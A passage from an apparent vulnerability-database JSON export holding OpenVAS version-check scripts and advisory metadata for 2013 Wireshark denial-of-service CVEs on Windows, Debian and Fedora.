"AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:11:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4081", "CVE-2013-4074"], "description": "This host is installed with Wireshark and is prone to multiple\n denial of service vulnerabilities.", "modified": "2017-05-11T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:803652", "href": "http://plugins.openvas.org/nasl.php?oid=803652", "type": "openvas", "title": "Wireshark Multiple DoS Vulnerabilities - June 13 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_mult_dos_vuln_jun13_win.nasl 6104 2017-05-11 09:03:48Z teissa $\n#\n# Wireshark Multiple DoS Vulnerabilities - June 13 (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to cause denial of\n service via a crafted packet.\n Impact Level: Application\";\n\ntag_affected = \"Wireshark 1.6.x before 1.6.16, 1.8.x before 1.8.8 on Windows\";\ntag_insight = \"- 'http_payload_subdissector' function in epan/dissectors/packet-http.c in\n HTTP dissector does not determine when to use a recursive approach.\n - 'dissect_capwap_data' function in epan/dissectors/packet-capwap.c in CAPWAP\n dissector incorrectly uses a -1 data value to represent an error condition.\";\ntag_solution = \"Upgrade to the Wireshark version 1.6.16 or 1.8.8 or later,\n For updates refer to http://www.wireshark.org/download\";\ntag_summary = \"This host is installed with Wireshark and is prone to multiple\n denial of service vulnerabilities.\";\n\nif(description)\n{\n script_id(803652);\n script_version(\"$Revision: 6104 $\");\n script_cve_id(\"CVE-2013-4081\",\"CVE-2013-4074\");\n script_bugtraq_id(60505, 60500);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-11 11:03:48 +0200 (Thu, 11 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 13:30:52 +0530 (Tue, 28 May 2013)\");\n script_name(\"Wireshark Multiple DoS Vulnerabilities - June 13 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1028648\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nsharkVer = \"\";\n\n## Get version from KB\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\n\nif(sharkVer && sharkVer=~ \"^(1.6|1.8)\")\n{\n ## Check for vulnerable Wireshark versions\n if(version_in_range(version:sharkVer, test_version:\"1.6.0\", test_version2:\"1.6.15\")||\n version_in_range(version:sharkVer, test_version:\"1.8.0\", test_version2:\"1.8.7\"))\n {\n security_message(0);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4076", "CVE-2013-4078", "CVE-2013-4075", "CVE-2013-4083", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4074", "CVE-2013-4077"], "description": "Multiple vulnerabilities were discovered in the dissectors for CAPWAP,\nGMR-1 BCCH, PPP, NBAP, RDP, HTTP, DCP ETSI and in the Ixia IxVeriWave\nfile parser, which could result in denial of service or the execution of\narbitrary code.", "modified": "2019-03-18T00:00:00", "published": "2013-06-17T00:00:00", "id": "OPENVAS:1361412562310892709", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892709", "type": "openvas", "title": "Debian Security Advisory DSA 2709-1 (wireshark - several vulnerabilities)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2709.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2709-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892709\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2013-4076\", \"CVE-2013-4081\", \"CVE-2013-4078\", \"CVE-2013-4082\", \"CVE-2013-4075\", \"CVE-2013-4077\", \"CVE-2013-4074\", \"CVE-2013-4083\");\n script_name(\"Debian Security Advisory DSA 2709-1 (wireshark - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-17 00:00:00 +0200 (Mon, 17 Jun 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2709.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"wireshark on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.2-5wheezy4.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your wireshark packages.\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities were discovered in the dissectors for CAPWAP,\nGMR-1 BCCH, PPP, NBAP, RDP, HTTP, DCP ETSI and in the Ixia IxVeriWave\nfile parser, which could result in denial of service or the execution of\narbitrary code.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libwireshark-data\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwireshark-dev\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwireshark2\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwiretap-dev\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwiretap2\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwsutil-dev\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwsutil2\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tshark\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-common\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-dbg\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-dev\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-doc\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:51:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4076", "CVE-2013-4078", "CVE-2013-4075", "CVE-2013-4083", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4074", "CVE-2013-4077"], "description": "Multiple vulnerabilities were discovered in the dissectors for CAPWAP,\nGMR-1 BCCH, PPP, NBAP, RDP, HTTP, DCP ETSI and in the Ixia IxVeriWave\nfile parser, which could result in denial of service or the execution of\narbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2013-06-17T00:00:00", "id": "OPENVAS:892709", "href": "http://plugins.openvas.org/nasl.php?oid=892709", "type": "openvas", "title": "Debian Security Advisory DSA 2709-1 (wireshark - several vulnerabilities)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2709.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2709-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"wireshark on Debian Linux\";\ntag_insight = \"Wireshark is a network 'sniffer' - a tool that captures and analyzes\npackets off the wire. Wireshark can decode too many protocols to list\nhere.\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.2-5wheezy4.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your wireshark packages.\";\ntag_summary = \"Multiple vulnerabilities were discovered in the dissectors for CAPWAP,\nGMR-1 BCCH, PPP, NBAP, RDP, HTTP, DCP ETSI and in the Ixia IxVeriWave\nfile parser, which could result in denial of service or the execution of\narbitrary code.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892709);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2013-4076\", \"CVE-2013-4081\", \"CVE-2013-4078\", \"CVE-2013-4082\", \"CVE-2013-4075\", \"CVE-2013-4077\", \"CVE-2013-4074\", \"CVE-2013-4083\");\n script_name(\"Debian Security Advisory DSA 2709-1 (wireshark - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-06-17 00:00:00 +0200 (Mon, 17 Jun 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2709.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libwireshark-data\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libwireshark-dev\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libwireshark2\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libwiretap-dev\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libwiretap2\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libwsutil-dev\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libwsutil2\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tshark\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-common\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-dbg\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-dev\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-doc\", ver:\"1.8.2-5wheezy4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-24T11:09:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-3559", "CVE-2013-4932", "CVE-2013-3558", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "description": "Check for the Version of wireshark", "modified": "2018-01-24T00:00:00", "published": "2013-10-03T00:00:00", "id": "OPENVAS:866933", "href": "http://plugins.openvas.org/nasl.php?oid=866933", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2013-17661", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2013-17661\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866933);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-03 10:10:34 +0530 (Thu, 03 Oct 2013)\");\n script_cve_id(\"CVE-2013-4920\", \"CVE-2013-4921\", \"CVE-2013-4922\", \"CVE-2013-4923\",\n \"CVE-2013-4924\", \"CVE-2013-4925\", \"CVE-2013-4926\", \"CVE-2013-4927\",\n \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\",\n \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\",\n \"CVE-2013-4082\", \"CVE-2013-4083\", \"CVE-2013-4928\", \"CVE-2013-4929\",\n \"CVE-2013-4930\", \"CVE-2013-4931\", \"CVE-2013-4932\", \"CVE-2013-4933\",\n \"CVE-2013-4934\", \"CVE-2013-4935\", \"CVE-2013-3559\", \"CVE-2013-3558\",\n \"CVE-2013-3557\", \"CVE-2013-3555\", \"CVE-2013-3562\", \"CVE-2013-3560\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for wireshark FEDORA-2013-17661\");\n\n tag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\nThis package lays base for libpcap, a packet capture and filtering\nlibrary, contains command-line utilities, contains plugins and\ndocumentation for wireshark. A graphical user interface is packaged\nseparately to GTK+ package.\n\";\n\n tag_affected = \"wireshark on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-17661\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/117186.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.10.2~6.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-3559", "CVE-2013-4932", "CVE-2013-3558", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-12-23T00:00:00", "id": "OPENVAS:1361412562310867188", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867188", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2013-17635", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2013-17635\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867188\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-12-23 11:56:32 +0530 (Mon, 23 Dec 2013)\");\n script_cve_id(\"CVE-2013-4920\", \"CVE-2013-4921\", \"CVE-2013-4922\", \"CVE-2013-4923\",\n \"CVE-2013-4924\", \"CVE-2013-4925\", \"CVE-2013-4926\", \"CVE-2013-4927\",\n \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\",\n \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\",\n \"CVE-2013-4082\", \"CVE-2013-4083\", \"CVE-2013-4928\", \"CVE-2013-4929\",\n \"CVE-2013-4930\", \"CVE-2013-4931\", \"CVE-2013-4932\", \"CVE-2013-4933\",\n \"CVE-2013-4934\", \"CVE-2013-4935\", \"CVE-2013-3559\", \"CVE-2013-3558\",\n \"CVE-2013-3557\", \"CVE-2013-3555\", \"CVE-2013-3562\", \"CVE-2013-3560\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for wireshark FEDORA-2013-17635\");\n\n\n script_tag(name:\"affected\", value:\"wireshark on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-17635\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-December/124287.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.10.2~4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-25T10:52:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-3559", "CVE-2013-4932", "CVE-2013-3558", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "description": "Check for the Version of wireshark", "modified": "2017-07-10T00:00:00", "published": "2013-12-23T00:00:00", "id": "OPENVAS:867188", "href": "http://plugins.openvas.org/nasl.php?oid=867188", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2013-17635", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2013-17635\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867188);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-12-23 11:56:32 +0530 (Mon, 23 Dec 2013)\");\n script_cve_id(\"CVE-2013-4920\", \"CVE-2013-4921\", \"CVE-2013-4922\", \"CVE-2013-4923\",\n \"CVE-2013-4924\", \"CVE-2013-4925\", \"CVE-2013-4926\", \"CVE-2013-4927\",\n \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\",\n \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\",\n \"CVE-2013-4082\", \"CVE-2013-4083\", \"CVE-2013-4928\", \"CVE-2013-4929\",\n \"CVE-2013-4930\", \"CVE-2013-4931\", \"CVE-2013-4932\", \"CVE-2013-4933\",\n \"CVE-2013-4934\", \"CVE-2013-4935\", \"CVE-2013-3559\", \"CVE-2013-3558\",\n \"CVE-2013-3557\", \"CVE-2013-3555\", \"CVE-2013-3562\", \"CVE-2013-3560\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for wireshark FEDORA-2013-17635\");\n\n tag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\nThis package lays base for libpcap, a packet capture and filtering\nlibrary, contains command-line utilities, contains plugins and\ndocumentation for wireshark. A graphical user interface is 